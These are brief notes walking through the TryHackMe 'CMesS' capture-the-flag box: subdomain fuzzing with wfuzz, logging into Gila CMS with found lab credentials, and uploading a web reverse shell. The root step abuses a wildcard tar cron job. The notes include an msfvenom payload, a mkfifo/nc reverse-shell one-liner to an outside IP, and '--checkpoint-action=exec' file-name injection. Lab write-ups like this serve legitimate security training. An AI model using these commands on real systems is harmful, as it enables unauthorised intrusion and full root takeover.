CMesS

https://tryhackme.com/room/cmess Can you root this Gila CMS box?

Notes

Nmap scan only shows 2 results ssh and port 80. Checking the site we find a gila cms but spending an hour poking around doesn’t lead to anything. Gobuster results dont find anything.

wfuzz

• wfuzz -c -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains- top1million-20000.txt --hc 400,404,403 -H "Host: FUZZ.cmess.thm" -u http://cmess.thm -t 100 -hw 290

getting waaaay to many responses so we can use –hw

we find dev.cmess.thm lets add it to the /etc/hosts and enumerate

• andre@cmess.thm:KPFTN_f2yxe%

now that we have creds we can login and upload revshell to /tmp and edit the htaccess to allow and after setting up a listener we have a www-data shell

privesc

crontab

*/2 * * * * root cd /home/mandre/backup && tar -zcf /tmp/andre_backup.tar.gz *

so anything we put into the /home/mandre/backup dir will be backed up to tmp every 2 mins.

checking linpeas can find -rwxrwxrwx 1 root root 36 Feb 6 2020 /opt/.password.bak

su to anre or ssh in andre:UQfsdCB7aAP6

wildcard esc

1. create payload msfvenom -p cmd/unix/reverse_netcat lhost 10.2.3.64 lport=6679 R
2. copy and paste the payload
3. echo "mkfifo /tmp/lhennp; nc 192.168.1.102 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
4. echo "" > "--checkpoint-action=exec=sh shell.sh"
5. echo "" > --checkpoint=1

have listener setup and wait for response and collect root flag!